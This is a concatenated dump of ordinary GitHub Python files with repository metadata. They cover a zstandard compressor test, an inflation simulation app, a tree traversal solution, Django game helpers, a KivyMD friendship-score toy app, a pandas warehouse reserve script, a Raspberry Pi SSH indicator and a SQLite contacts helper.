b\"\".join(cctx.read_to_iter(source))\n self.assertEqual(len(compressed), 111)\n\n def test_bad_size(self):\n cctx = zstd.ZstdCompressor()\n\n source = io.BytesIO(b\"a\" * 42)\n\n with 
self.assertRaisesRegex(zstd.ZstdError, \"Src size is incorrect\"):\n b\"\".join(cctx.read_to_iter(source, size=2))\n\n # Test another operation on errored compressor.\n b\"\".join(cctx.read_to_iter(source))\n\n def test_read_exception(self):\n b = CustomBytesIO(b\"foo\" * 1024)\n b.read_exception = IOError(\"read\")\n\n cctx = zstd.ZstdCompressor()\n\n it = cctx.read_to_iter(b)\n\n with self.assertRaisesRegex(IOError, \"read\"):\n next(it)\n","repo_name":"indygreg/python-zstandard","sub_path":"tests/test_compressor_read_to_iter.py","file_name":"test_compressor_read_to_iter.py","file_ext":"py","file_size_in_byte":4473,"program_lang":"python","lang":"en","doc_type":"code","stars":424,"dataset":"github-code","pt":"27"} +{"seq_id":"41338373864","text":"import numpy as np\nimport pandas as pd\n\nimport altair as alt\n\nfrom .plotting import select_nearest, get_selectors, add_rules, mark_years, add_text\n\n__description__ = \"\"\"\nThis application adjusts an initial capital for inflation. Inflation can be\ngiven by providing an optimistic (minimum), a pessimistic (maximum) and a\nrealistic (mode) estimate.\n\nThe compounding frequency can be either annually (by default) or daily (with\nthe checkbox marked), The results are similar but the interpretation of the\nrates are different when using daily compounding.\n\nThis app does not consider any type of interest or gain, to check the effects\nof compounding interests, check the \"Compound Interest\" and the \"Flex Term vs\nFixed Term\" apps in the sidebar.\n\"\"\"\n\n\ndef inflation_simulation(st, **state):\n st.title(\"Inflation Simulation\")\n st.write(__description__)\n\n st.write(\"## Initial Capital\")\n initial_capital = st.number_input(\"Capital\", value=10_000.0)\n\n st.write(\"## Inflation Estimation\")\n\n left, middle, right = st.columns(3)\n\n optimistic = left.number_input(\"Optimistic Inflation (%)\", value=2.0, min_value=0.0)\n\n realistic_value = max(2.5, optimistic + 0.01)\n realistic = middle.number_input(\n \"Realistic Inflation (%)\", value=realistic_value, min_value=optimistic\n )\n\n pessimistic_value = max(3.5, realistic + 0.01)\n pessimistic = right.number_input(\n \"Pessimistic Inflation (%)\", value=pessimistic_value, min_value=realistic\n )\n\n daily_conpound = st.checkbox(\"Daily Compounding\", value=False)\n\n years = st.slider(\"Years\", min_value=1, max_value=15, value=2)\n\n st.write(\"## Simulation Results\")\n\n median_capital, min_capital, max_capital = simulate_inflation(\n initial_capital, optimistic, realistic, pessimistic, years, daily_conpound\n )\n\n st.write(\"### Capital at the End\")\n\n left, middle, right = st.columns(3)\n\n max_delta = (initial_capital - max_capital[-1]) / initial_capital * 100\n left.metric(\"Optimistic Case\", f\"${max_capital[-1]:.2f}\", f\"-{max_delta:.2f}%\")\n\n min_delta = (initial_capital - min_capital[-1]) / initial_capital * 100\n right.metric(\"Pessimistic Case\", f\"${min_capital[-1]:.2f}\", f\"-{min_delta:.2f}%\")\n\n median_delta = (initial_capital - median_capital[-1]) / initial_capital * 100\n middle.metric(\n \"Realistic Case\", f\"${median_capital[-1]:.2f}\", f\"-{median_delta:.2f}%\"\n )\n\n plot_comparison(st, median_capital, min_capital, max_capital)\n\n\ndef simulate_inflation(\n initial_capital, optimistic, realistic, pessimistic, years, daily_conpound\n):\n runs = 5_000\n days = years * 365\n data = np.tile(initial_capital, (runs, days))\n\n optimistic_rate = optimistic / 100\n realistic_rate = realistic / 100\n pessimistic_rate = pessimistic / 100\n\n 
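# note: with annual compounding, the sampled annual rate r is converted below to the equivalent daily rate d = (1 + r)**(1/365) - 1, chosen so that (1 + d)**365 == 1 + r; with daily compounding, the rate is simply divided by 365\n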
generator = np.random.default_rng()\n rate = generator.triangular(\n optimistic_rate, realistic_rate, pessimistic_rate, size=(runs, days)\n )\n\n # Kept as legacy formula\n # interest_rate = rate if daily_conpound else rate * np.linspace(1, 365, days)\n # exponent = np.arange(days) if daily_conpound else years\n\n interest_rate = rate / 365 if daily_conpound else np.power(1 + rate, 1 / 365) - 1\n exponent = np.arange(days)\n\n rate_compound = (1 + interest_rate) ** exponent\n\n data /= rate_compound\n\n median_data = np.median(data, axis=0)\n minimum_bound = np.quantile(data, 0.05, axis=0)\n maximum_bound = np.quantile(data, 0.95, axis=0)\n\n return median_data, minimum_bound, maximum_bound\n\n\ndef plot_comparison(st, median_capital, min_capital, max_capital):\n length = len(median_capital)\n\n positions = np.arange(length)\n\n coordinates = [\n f\"({pos}, {value:.2f})\" for pos, value in zip(positions, median_capital)\n ]\n\n data = {\n \"x\": positions,\n \"median\": median_capital,\n \"minimal\": min_capital,\n \"maximum\": max_capital,\n \"coordinates\": np.array(coordinates),\n }\n\n df = pd.DataFrame(data)\n\n axis = alt.Axis(labelFontSize=20, titleFontSize=22)\n\n line = (\n alt.Chart(df)\n .mark_line()\n .encode(\n x=alt.X(\n \"x\",\n axis=axis,\n title=\"Time (days)\",\n scale=alt.Scale(domain=[0, length], clamp=False, nice=False),\n ),\n y=alt.Y(\"median\", axis=axis, title=\"Capital\", scale=alt.Scale(zero=False)),\n )\n )\n\n area = (\n alt.Chart(df)\n .mark_area()\n .encode(x=alt.X(\"x\"), y=\"minimal:Q\", y2=\"maximum:Q\", opacity=alt.value(0.2))\n )\n\n nearest = select_nearest()\n selectors = get_selectors(df, nearest)\n text = add_text(line, \"coordinates:N\", nearest)\n rules = add_rules(df, nearest)\n years = mark_years(df)\n\n points = line.mark_point().transform_filter(nearest)\n\n chart = (\n alt.layer(line, area, selectors, points, rules, text, years)\n .interactive()\n .properties(\n width=1600, height=500, title=\"Real Value over Time Adjusted for Inflation\"\n )\n .configure_title(fontSize=24)\n )\n\n st.altair_chart(chart, use_container_width=True)\n","repo_name":"ELC/finance-tools","sub_path":"pages/inflation.py","file_name":"inflation.py","file_ext":"py","file_size_in_byte":5131,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"27"} +{"seq_id":"7902483476","text":"\"\"\"\nGiven a binary tree A consisting of N nodes, return a 2-D array denoting the vertical order traversal of A.\n\nGo through the example and image for more details.\n\nNOTE:\n\n If 2 or more Tree Nodes share the same vertical level then the one with the earlier occurrence in the level-order traversal of the tree comes first in the output.\n Row 1 of the output array will be the nodes on the leftmost vertical line; similarly, the last row of the output array will be the nodes on the rightmost vertical line.\n\n\nWe need to keep track of the number of left moves and the number of right moves each node takes\nuse a dict to group the elements\nuse a queue to traverse the tree BFS style\nturn the dict into a list (iterate from min key to max key)\n\n\nO(n) time complexity\nO(w) space where w is the width of the tree\n\n\n\"\"\"\nimport collections\nfrom typing import List, Optional, Dict\n\n\n# Definition for a binary tree node\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nQueueNode = collections.namedtuple('QueueNode', 'node level')\n\n\nclass Solution:\n # @param A : root node of tree\n # @return a list of list of integers\n def 
verticalOrderTraversal(self, root: TreeNode) -> List[List[int]]:\n if not root:\n return []\n deque = collections.deque()\n deque.append(QueueNode(root, 0))\n levels: Dict[int, List[int]] = collections.defaultdict(list)\n while deque:\n node, level = deque.popleft()\n if not node:\n continue\n levels[level].append(node.val)\n deque.append(QueueNode(node.left, level - 1))\n deque.append(QueueNode(node.right, level + 1))\n return self.build_result(levels)\n\n def build_result(self, levels: Dict[int, List[int]]) -> List[List[int]]:\n result: List[List[int]] = []\n min_level: int = min(levels)\n max_level: int = max(levels)\n for level in range(min_level, max_level + 1):\n result.append(levels[level])\n return result\n\n","repo_name":"JadielTeofilo/General-Algorithms","sub_path":"src/interviewbit/tree/vertical_traversal.py","file_name":"vertical_traversal.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"4670456629","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDocumentation for this lies in readme.md\n\"\"\"\n\nfrom datetime import datetime\nfrom django.core.exceptions import ValidationError\n\nfrom kingdom.models import Kingdom, Folk, Message, Quality, Claim\n\n\n######\n# Kingdom scripts\n######\ndef kingdom_message(self, content, level=Message.INFORMATION):\n\t\"\"\"\n\tRegister a message on this kingdom.\n\t\"\"\"\n\n\tMessage(\n\t\tkingdom=self,\n\t\tcontent=content\n\t).save()\nKingdom.message = kingdom_message\n\n\ndef kingdom_add_claim(self, kingdom, level):\n\t\"\"\"\n\tAdd a claim on specified kingdom.\n\t\"\"\"\n\n\tClaim(\n\t\toffender=kingdom,\n\t\toffended=self,\n\t\tlevel=level\n\t).save()\nKingdom.add_claim = kingdom_add_claim\n\n\ndef kingdom_has_claim(self, kingdom):\n\t\"\"\"\n\tReturns None if there is no claim, or returns the level of the claim\n\t\"\"\"\n\n\ttry:\n\t\tclaim = self.offended_set.get(offender=kingdom)\n\t\treturn claim.level\n\texcept Claim.DoesNotExist:\n\t\treturn None\nKingdom.has_claim = kingdom_has_claim\n\n\n######\n# Folks scripts\n######\ndef folk_die(self):\n\t\"\"\"\n\tKill this folk.\n\t\"\"\"\n\n\tself.death = datetime.now()\n\tself.save()\nFolk.die = folk_die\n\n\ndef folk_age(self):\n\t\"\"\"\n\tReturn the age in years for this folk.\n\tOne real day is one year.\n\t\"\"\"\n\n\tif self.death is not None:\n\t\traise ValidationError(\"Calling age() on a dead person is not allowed.\")\n\treturn (datetime.now() - self.birth).days\nFolk.age = folk_age\n\n\ndef folk_add_quality(self, slug):\n\t\"\"\"\n\tAdd a new quality.\n\t\"\"\"\n\n\tquality = Quality.objects.get(slug=slug)\n\ttry:\n\t\tself.quality_set.add(quality)\n\texcept:\n\t\tpass\n\treturn quality\nFolk.add_quality = folk_add_quality\n\n\ndef folk_has_quality(self, slug):\n\t\"\"\"\n\tReturns True if the folk has the quality\n\t\"\"\"\n\n\treturn self.quality_set.filter(slug=slug).exists()\nFolk.has_quality = folk_has_quality\n\n\ndef folk_remove_quality(self, slug):\n\t\"\"\"\n\tRemove a quality.\n\t\"\"\"\n\n\tquality = Quality.objects.get(slug=slug)\n\ttry:\n\t\tself.quality_set.remove(quality)\n\texcept:\n\t\tpass\n\treturn quality\nFolk.remove_quality = folk_remove_quality\n\n\ndef sum_stats(folks, attribute):\n\t\"\"\"\n\tReturns the sum of the chosen attribute\n\t\"\"\"\n\n\treturn sum([getattr(folk, attribute) for folk in folks])\n\n\ndef avg_stats(folks, attribute):\n\t\"\"\"\n\tReturns the average of the chosen attribute\n\t\"\"\"\n\t\n\tif len(folks) == 0:\n\t\treturn 
0\n\telse:\n\t\treturn sum_stats(folks, attribute) / len(folks)\n","repo_name":"Neamar/kingdoms","sub_path":"kingdom/scripts.py","file_name":"scripts.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"27"} +{"seq_id":"72510594631","text":"from kivymd.app import MDApp\r\nfrom kivy.uix.screenmanager import Screen, ScreenManager, SlideTransition\r\nfrom kivymd.uix.snackbar import Snackbar\r\nfrom kivymd.uix.dialog import MDDialog\r\nfrom kivy.lang import Builder\r\nfrom kivymd.uix.button import MDFlatButton\r\nfrom kivymd.uix.label import MDLabel\r\nimport random\r\n\r\n\r\n\r\nclass StartScreen(Screen):\r\n\t\r\n\tdef checkentry(self):\r\n\t\tfield1 = self.ids.text1.text\r\n\t\tfield2 = self.ids.text2.text\r\n\t\tif len(field1)==0 or len(field2)==0 :\r\n\t\t\tSnackbar(text=\"Please Check Your Names\").show()\r\n\t\t\tcbutton = MDFlatButton(text='Close',on_release=self.closeNN)\r\n\t\t\tClose_button = [cbutton]\r\n\t\t\tself.dialog2 = MDDialog(title='Warning', text=\"The Following Stats Might Be Falsy Because of Invalid Names. Please Try Again With Corrrect Names\", size_hint=(0.95,1), buttons=Close_button)\r\n\t\t\tself.dialog2.open()\r\n\t\tpsbl = [\"ayush\",\"Ayush\"]\r\n\t\tmessage = \"Woah, It turns out that you are friends with Ayush. Ayush is the the sweetest guy you'll ever meet in your life. Make sure to keep him Happy!\"\r\n\r\n\tdef closeN(self,obj):\r\n\t\tself.dialog1.dismiss()\r\n\r\n\tdef closeNN(self,obj):\r\n\t\tself.dialog2.dismiss()\r\n\r\n\tdef callback(self):\r\n\t\tcbutton = MDFlatButton(text='Close',on_release=self.close)\r\n\t\tClose_button = [cbutton]\r\n\t\tself.dialog = MDDialog(title='Share With Your Friends.', text='Share This App with your Friends.\\nIn Any Way You Can think Of.', size_hint=(0.95,1), buttons=Close_button)\r\n\t\tself.dialog.open()\r\n\r\n\tdef close(self,obj):\r\n\t\tself.dialog.dismiss()\r\n\r\n\tdef addwidgets(self):\r\n\t\tpass\r\n\t\t\r\n\r\nclass NextScreen(Screen):\r\n\t\r\n\tn = 0\r\n\tpercentage = round(random.randint(1,30) * 3.33 , 2)\r\n\t\t\r\n\tdef calculator(self):\r\n\t\t\r\n\t\tprint(self.percentage)\r\n\t\treturn self.percentage\r\n\r\n\tdef level(self, value):\r\n\t\tprint(value)\r\n\t\tif value >= 90:\r\n\t\t\tmessage = \"Extremely Awesomely Fantastic Friendship\"\r\n\t\t\treturn message\r\n\r\n\t\telif value >= 80 and value < 90:\r\n\t\t\tmessage = \"Awesomely Fantastic Friendship\"\r\n\t\t\treturn message\r\n\r\n\t\telif value>= 70 and value < 80:\r\n\t\t\tmessage = \"Fantastic Friendship\"\r\n\t\t\treturn message\r\n\r\n\t\telif value >= 50 and value < 70:\r\n\t\t\tmessage = \"Average Friendship\"\r\n\t\t\treturn message\r\n\r\n\t\telif value >= 30 and value < 50:\r\n\t\t\tmessage = \"You Need to work on your Friendship!\"\r\n\t\t\treturn message\r\n\r\n\t\telif value >= 1 and value < 30:\r\n\t\t\tmessage = \"Do You Even Know This Person?\"\r\n\t\t\treturn message\r\n\t\telse:\r\n\t\t\tpass\r\n\tdef clearcache(self):\r\n\t\t\r\n\t\ttry:\r\n\t\t\tself.remove_widget(self.ids.box)\r\n\t\t\tself.remove_widget(self.ids.box1)\r\n\t\texcept:\r\n\t\t\tpass\r\n\t\t\r\n\t\tself.removeW()\r\n\t\tprint(\"Removed\")\r\n\t\tself.addW()\r\n\t\tprint(\"Added\")\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t\r\n\tdef removeW(self):\r\n\t\tself.n+=1\r\n\t\tif self.n != 1:\r\n\t\t\tself.remove_widget(self.box)\r\n\t\t\tself.remove_widget(self.box1)\r\n\r\n\tdef addW(self):\r\n\t\tNpercentage = round(random.randint(1,30) * 3.33 , 2)\r\n\t\tprint(Npercentage)\r\n\t\tself.box = 
MDLabel(\n\t\t\t\ttext= f\"{Npercentage} %\",\n\t\t\t\thalign= 'center',\n\t\t\t\tfont_style= 'H1',\n\t\t\t\ttheme_text_color= 'Custom',\n\t\t\t\ttext_color= (1,0,0,1),\n\t\t\t\tpos_hint= {'center_x':0.5, 'center_y':0.9})\n\t\tself.add_widget(self.box)\n\t\tself.box1 = MDLabel(\n\t\t\t\ttext= f\"{self.level(Npercentage)}\",\n\t\t\t\thalign= 'center',\n\t\t\t\tfont_style= 'H3',\n\t\t\t\ttheme_text_color= 'Custom',\n\t\t\t\ttext_color= (0,0,1,1),\n\t\t\t\tpos_hint= {'center_x':0.5, 'center_y':0.5})\n\t\tself.add_widget(self.box1)\n\t\t\n\nclass ScreenManager(ScreenManager):\n\tpass\n\n\nclass MyApp(MDApp):\n\tdef build(self):\n\t\tself.theme_cls.primary_palette= \"Purple\"\n\t\tmaster = Builder.load_file(\"main.kv\")\n\t\treturn master\n\t\n\nMyApp().run()\n","repo_name":"AyushUlric/FirstApp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"28208112749","text":"\"\"\"\nThis script prepares the reserves file in a convenient format\n\n\"\"\"\nimport utils\nutils.path_append()\n\nimport os\nimport datetime as dt\nimport pandas as pd\n\n\nfrom hidden_settings import WAREHOUSE_RESERVE\nfrom service import get_filtered_df, save_to_excel, print_complete, get_data\nfrom settings import CODES, HOLDING, NAME_HOLDING, LINK_HOLDING, LINK, WHS, EAN\nfrom settings import SOFT_RSV, HARD_RSV, SOFT_HARD_RSV, QUOTA, PRODUCT, CURRENT\nfrom settings import QUOTA_BY_AVAILABLE, AVAILABLE_REST, TOTAL_RSV, DATE_RSV\nfrom settings import TABLE_RESERVE, SOURCE_DIR, RESULT_DIR, TABLE_HOLDINGS\nfrom settings import FUTURE, TABLE_RESERVE_CURRENT, TABLE_RESERVE_FUTURE\nfrom settings import SOFT_HARD_RSV_CURRENT, SOFT_HARD_RSV_FUTURE, EXPECTED_DATE\nfrom settings import TABLE_RSV_BY_DATE, EXCLUDE_STRING, TABLE_EXCEPTIONS\nfrom settings import EX_RSV, PG_PROGRAMM, WORD_YES\n\n\nSOURCE_FILE = '1275 - Резервы и резервы-квоты по холдингам.xlsx'\nEMPTY_ROWS = 2\nHOLDING_LOC = 'Код холдинга'\nRSV_HOLDING = 'Наименование'\nWHS_LOC = 'Склад'\nEAN_LOC = 'EAN'\nPRODUCT_NAME = 'Наименование товара'\nSOFT_RSV_LOC = 'Мягкий резерв'\nHARD_RSV_LOC = 'Жесткий резерв'\nQUOTA_RSV = 'Резерв квота остаток'\nBY_LINK = '_всего, по ШК-Склад'\nAVAILABLE = 'Доступность на складе'\nEXPECTED_DATE_LOC = 'Дата ожидаемой доставки'\nRESERVE_FOR = 'Дата резерва По'\nLINK_DATE = 'Сцепка Дата-Склад-Наименование холдинга-ШК'\n\n\ndef get_reserve():\n excel = pd.ExcelFile(SOURCE_DIR + SOURCE_FILE)\n df = get_filtered_df(\n excel, WAREHOUSE_RESERVE, WHS_LOC, skiprows=EMPTY_ROWS\n )\n holdings = pd.ExcelFile(RESULT_DIR + TABLE_HOLDINGS).parse()\n df = pd.merge(\n df.rename(columns={HOLDING_LOC: CODES}),\n holdings, on=CODES, how='left'\n )\n idx = df[df[HOLDING].isnull()].index\n df.loc[idx, HOLDING] = df.loc[idx, CODES]\n df.loc[idx, NAME_HOLDING] = df.loc[idx, RSV_HOLDING]\n df.loc[df[AVAILABLE] < 0, AVAILABLE] = 0\n return df\n\n\ndef reserve_by_date(df):\n static_col = [\n WHS_LOC, NAME_HOLDING, EAN_LOC,\n PRODUCT_NAME, EXPECTED_DATE_LOC\n ]\n num_col = [SOFT_RSV_LOC, HARD_RSV_LOC, QUOTA_RSV]\n df = df[static_col + num_col].copy().groupby(\n static_col, dropna=False\n )[num_col].sum().reset_index()\n df[LINK_DATE] = (df[EXPECTED_DATE_LOC].map(str) + df[WHS_LOC]\n + df[NAME_HOLDING] + df[EAN_LOC].map(str))\n df[LINK] = df[WHS_LOC] + df[EAN_LOC].map(str)\n\n df[EXCLUDE_STRING] = ''\n df_except = get_data(TABLE_EXCEPTIONS)\n ex_list = 
list(set(df_except[EX_RSV].to_list()))\n idx = df[df[LINK_DATE].isin(ex_list)].index\n df.loc[idx, EXCLUDE_STRING] = WORD_YES\n\n df_holdings = get_data(TABLE_HOLDINGS)[[\n NAME_HOLDING, PG_PROGRAMM\n ]].drop_duplicates(subset=[NAME_HOLDING])\n df = df.merge(df_holdings, on=NAME_HOLDING, how='left')\n static_col = [\n WHS_LOC, NAME_HOLDING, PG_PROGRAMM, EAN_LOC,\n PRODUCT_NAME, EXPECTED_DATE_LOC\n ]\n\n df = df[static_col + num_col + [EXCLUDE_STRING, LINK_DATE, LINK]]\n df = df.rename(columns={\n WHS_LOC: WHS,\n EAN_LOC: EAN,\n PRODUCT_NAME: PRODUCT,\n SOFT_RSV_LOC: SOFT_RSV,\n HARD_RSV_LOC: HARD_RSV,\n QUOTA_RSV: QUOTA,\n EXPECTED_DATE_LOC: EXPECTED_DATE\n })\n return df\n\n\ndef table_processing(df, period=None):\n idx_date = df.loc[df[EXPECTED_DATE_LOC].isnull()].index\n df.loc[idx_date, EXPECTED_DATE_LOC] = df.loc[idx_date, RESERVE_FOR]\n today = dt.date.today() - dt.timedelta(days=1)\n next_month = today.month + 1 if today.month < 12 else 1\n next_month_fday = pd.to_datetime(dt.date(today.year, next_month, 1))\n if period == CURRENT:\n df = df[df[EXPECTED_DATE_LOC] < next_month_fday]\n elif period == FUTURE:\n df = df[df[EXPECTED_DATE_LOC] >= next_month_fday]\n\n group_df = df.groupby([\n WHS_LOC, HOLDING, NAME_HOLDING, EAN_LOC, PRODUCT_NAME\n ]).agg({\n SOFT_RSV_LOC: 'sum',\n HARD_RSV_LOC: 'sum',\n QUOTA_RSV: 'sum',\n AVAILABLE: 'max',\n EXPECTED_DATE_LOC: 'max'\n }).reset_index()\n group_df.insert(0, LINK, group_df[WHS_LOC] + group_df[EAN_LOC].map(str))\n group_df.insert(\n 0, LINK_HOLDING,\n group_df[WHS_LOC] + group_df[NAME_HOLDING] + group_df[EAN_LOC].map(str)\n )\n group_df = group_df.merge(\n group_df.groupby([LINK]).agg({QUOTA_RSV: 'sum'}),\n on=LINK,\n how='left',\n suffixes=('', BY_LINK)\n )\n group_df.insert(\n len(group_df.axes[1]),\n QUOTA_BY_AVAILABLE,\n (group_df[QUOTA_RSV] / group_df[QUOTA_RSV + BY_LINK]) * group_df[\n QUOTA_RSV + BY_LINK\n ].where(\n group_df[QUOTA_RSV + BY_LINK] < group_df[AVAILABLE],\n other=group_df[AVAILABLE]\n )\n )\n group_df.loc[group_df[QUOTA_BY_AVAILABLE].isnull(), QUOTA_BY_AVAILABLE] = 0\n group_df.drop(QUOTA_RSV + BY_LINK, axis=1, inplace=True)\n group_df[SOFT_HARD_RSV] = group_df[SOFT_RSV_LOC] + group_df[HARD_RSV_LOC]\n group_df[TOTAL_RSV] = (\n group_df[SOFT_HARD_RSV] + group_df[QUOTA_BY_AVAILABLE]\n )\n\n group_df = group_df.rename(columns={\n WHS_LOC: WHS,\n EAN_LOC: EAN,\n PRODUCT_NAME: PRODUCT,\n SOFT_RSV_LOC: SOFT_RSV,\n HARD_RSV_LOC: HARD_RSV,\n QUOTA_RSV: QUOTA,\n AVAILABLE: AVAILABLE_REST,\n EXPECTED_DATE_LOC: DATE_RSV\n })\n return group_df.round()\n\n\ndef merge_period_rsv(df):\n rsv_current = get_data(TABLE_RESERVE_CURRENT).rename(columns={\n SOFT_HARD_RSV: SOFT_HARD_RSV_CURRENT\n })[[LINK_HOLDING, SOFT_HARD_RSV_CURRENT]]\n rsv_future = get_data(TABLE_RESERVE_FUTURE).rename(columns={\n SOFT_HARD_RSV: SOFT_HARD_RSV_FUTURE\n })[[LINK_HOLDING, SOFT_HARD_RSV_FUTURE]]\n df = df.merge(rsv_current, on=LINK_HOLDING, how='left')\n df = df.merge(rsv_future, on=LINK_HOLDING, how='left')\n df = utils.void_to(df, SOFT_HARD_RSV_CURRENT, 0)\n df = utils.void_to(df, SOFT_HARD_RSV_FUTURE, 0)\n return df\n\n\ndef main():\n if os.environ.get('SRS_DOWNLOAD') is None:\n from update_data import update_reserve\n update_reserve(SOURCE_FILE)\n df = get_reserve()\n df_by_date = reserve_by_date(df)\n save_to_excel(RESULT_DIR + TABLE_RSV_BY_DATE, df_by_date)\n df_current = table_processing(df, CURRENT)\n save_to_excel(RESULT_DIR + TABLE_RESERVE_CURRENT, df_current)\n df_future = table_processing(df, FUTURE)\n save_to_excel(RESULT_DIR + 
TABLE_RESERVE_FUTURE, df_future)\n df = merge_period_rsv(table_processing(df))\n save_to_excel(RESULT_DIR + TABLE_RESERVE, df)\n print_complete(__file__)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"AlexeyAnanchenko/pandas_work_scripts","sub_path":"scripts/base_scripts/reserve.py","file_name":"reserve.py","file_ext":"py","file_size_in_byte":6879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73890405831","text":"import RPi.GPIO as GPIO\nimport time \nimport os\nimport subprocess\n#from subprocess import run\n#import sys\n\nbuttonPin = 21\nblueLED = 16\nyellowLED = 12\nflag = 0\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\n\nGPIO.setup(buttonPin, GPIO.IN, pull_up_down=GPIO.PUD_UP)\nGPIO.setup(blueLED, GPIO.OUT)\nGPIO.setup(yellowLED, GPIO.OUT)\n\nlast_state = True\ninput_state = True\npress_start = time.clock()\n\nprint(\" SSH INDICATION ACTIVE\")\nGPIO.output(blueLED, GPIO.HIGH)\n'''\nk = 0\nwhile k<100:\n print(time.clock())\n time.sleep(0.1)\n k+=1\n'''\nwhile True:\n input_state = GPIO.input(buttonPin)\n \n if(input_state):\n last_state = True\n\n if (not input_state):\n \n if(last_state == False):\n while flag < 20 and not input_state:\n GPIO.output(blueLED, GPIO.LOW)\n time.sleep(0.1)\n GPIO.output(blueLED, GPIO.HIGH)\n time.sleep(0.1)\n flag += 1\n input_state = GPIO.input(buttonPin)\n if flag > 19:\n print(\" SHUTDOWN\")\n flag = 0\n os.system('sudo shutdown -h now')\n\n print(\"BUTTON PRESSED\")\n # GPIO.output(yellowLED, GPIO.LOW)\n # GPIO.output(blueLED, GPIO.LOW)\n # time.sleep(3)\n last_state = False\n \n try:\n output2 = subprocess.check_output('last | grep \\'still logged in\\'', shell=True)\n except:\n #print(\"error\")\n GPIO.output(yellowLED, GPIO.LOW)\n else:\n #print(\"ssh active\")\n #print(output2)\n GPIO.output(yellowLED, GPIO.HIGH)\n \n #GPIO.output(blueLED, GPIO.HIGH)\n #GPIO.output(yellowLED, GPIO.HIGH)\n #GPIO.output(blueLED, GPIO.LOW)\n #GPIO.output(yellowLED, GPIO.LOW)\n time.sleep(1)\n GPIO.output(blueLED, GPIO.HIGH)\n\nGPIO.cleanup()\n","repo_name":"blusky-cloud/Raspi-Code","sub_path":"rpzwh_1_dcm/pythons/startup_scripts/ssh_indicator.py","file_name":"ssh_indicator.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"16999786586","text":"import sqlite3\n\npath_database = \"base.db\"\n\nconnect = sqlite3.connect(path_database, check_same_thread=False)\ncursor = connect.cursor()\n\nview_data = (\n 'Number',\n 'Name',\n 'Link',\n 'Price',\n 'Profile',\n 'Information',\n 'Address')\n\nview_data_telegram = (\n 'Number',\n 'Name',\n 'Seen',\n 'Profile',\n 'Processed')\n\n\n# Common\ndef _exe_raw_sql(sql):\n try:\n cursor.execute(sql)\n fetchall = cursor.fetchall()\n except sqlite3.DatabaseError as err:\n raise err\n else:\n connect.commit()\n return fetchall\n\n\n# People\ndef create_bd():\n sql = \"\"\"\n CREATE TABLE if not exists people(\n Id INTEGER PRIMARY KEY UNIQUE,\n Number VARCHAR(255) NOT NULL,\n Name VARCHAR(255) NOT NULL,\n Link VARCHAR(255),\n Price VARCHAR(255),\n Profile VARCHAR(255),\n Information VARCHAR(255),\n Address VARCHAR(255),\n CONSTRAINT unique_local UNIQUE (Number)\n );\n \"\"\"\n _exe_raw_sql(sql)\n\n\ndef insert_into_table(*args, table='people'):\n if table == 'people':\n colons = view_data\n elif table == 'telegram':\n colons = view_data_telegram\n data = dict(zip(colons, args))\n\n cols = ', '.join(\"'{}'\".format(col) for col in data.keys())\n vals = 
', '.join(':{}'.format(col) for col in data.keys())\n    sql = 'INSERT INTO {} ({}) VALUES ({})'.format(table, cols, vals)\n    try:\n        cursor.execute(sql, data)\n    except sqlite3.DatabaseError as err:\n        raise err\n    connect.commit()\n\n\ndef get_all():\n    sql = \"SELECT * FROM people;\"\n    return _exe_raw_sql(sql)\n\n\n# Filters People\ndef filter_by_links(links):\n    \"\"\"links should be set, Return Set of links for processing\"\"\"\n\n    assert isinstance(links, set)\n\n    sql = \"SELECT Link FROM people WHERE Link in ({});\".format(\n        ', '.join([\"'{}'\".format(item) for item in links]))\n    resp = _exe_raw_sql(sql)\n    return set(links) - set([item[0] for item in resp])\n\n\ndef is_not_phone_exists(phone):\n    \"\"\"Return True or False\"\"\"\n\n    sql = \"SELECT Number FROM people WHERE Number is '{}';\".format(phone)\n    resp = _exe_raw_sql(sql)\n    return not any(resp)\n\n\ndef number_exists(number):\n    \"\"\"Return the matching rows (truthy if the number exists)\"\"\"\n    return _exe_raw_sql(\"SELECT Number FROM people WHERE Number is '{}';\"\n                        .format(number))\n\n\ndef link_exists(link):\n    \"\"\"Return the matching rows (truthy if the link exists)\"\"\"\n    return _exe_raw_sql(\"SELECT Link FROM people WHERE Link is '{}';\"\n                        .format(link))\n\n\n# Telegram\ndef create_bd_telegram():\n    sql = \"\"\"\n    CREATE TABLE if not exists telegram(\n    Number VARCHAR(20) NOT NULL,\n    Name VARCHAR(100) NOT NULL,\n    Seen VARCHAR(30),\n    Profile VARCHAR(255),\n    Processed INTEGER,\n    CONSTRAINT unique_local UNIQUE (Number)\n    );\n    \"\"\"\n    _exe_raw_sql(sql)\n\n\ndef is_telegram_acount(phone):\n    \"\"\"Return True or False\"\"\"\n\n    sql = \"SELECT Number FROM telegram WHERE Number is '{}';\".format(phone)\n    resp = _exe_raw_sql(sql)\n    return any(resp)\n\n\ndef get_all_from_telegram():\n    sql = \"SELECT * FROM telegram;\"\n    return _exe_raw_sql(sql)\n\n\ndef get_user_from_telegram(phone):\n    sql = \"SELECT Name, Seen, Profile, Processed \" \\\n          \"FROM telegram WHERE Number is '{}';\".format(phone)\n    return _exe_raw_sql(sql)\n\n\ndef get_unprocessed_users():\n    sql = \"SELECT Number FROM telegram \" \\\n          \"WHERE Name IS NOT 'Not found' AND Processed IS NULL;\"\n    return [item[0] for item in _exe_raw_sql(sql)]\n\n\ndef set_user_processed(phone):\n    sql = \"UPDATE telegram SET Processed=1 WHERE Number = '{}'\".format(phone)\n    return [item[0] for item in 